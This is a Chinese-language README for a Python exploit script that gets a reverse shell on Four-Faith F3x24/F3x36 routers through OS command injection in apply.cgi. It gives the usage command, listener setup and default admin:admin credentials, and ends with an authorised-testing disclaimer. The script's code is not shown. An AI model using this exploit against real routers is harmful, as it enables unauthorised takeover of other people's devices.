这是一个针对四信(Four-Faith)路由器型号 F3x24 和 F3x36 的漏洞利用程序,用于获取反向 Shell。
“四信路由器型号 F3x24 和 F3x36 受到操作系统(OS)命令注入漏洞的影响。至少固件版本 2.0 允许经过身份验证的远程攻击者通过 apply.cgi 修改系统时间时,通过 HTTP 执行任意操作系统命令。此外,该固件版本存在默认凭据,如果未更改,实际上会将此漏洞转变为未经身份验证的远程操作系统命令执行问题。”
来源:nist.gov
此脚本基于 VulnCheck 观察到的载荷。
在运行漏洞利用程序之前,请先在您的机器上启动一个 TCP 服务器。
然后运行
python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT
其中
RHOST 是远程 IP 地址。您也可以添加域名。LHOST 是您机器上 TCP 服务器的 IP。LPORT 是您 TCP 服务器的端口。USERNAME 和 PASSWORD 是路由器的凭据。默认为 admin:admin。RPORT 是路由器的远程端口。默认为 80。请确保仅在测试和授权环境中使用此漏洞利用程序。
切勿将其用于恶意目的。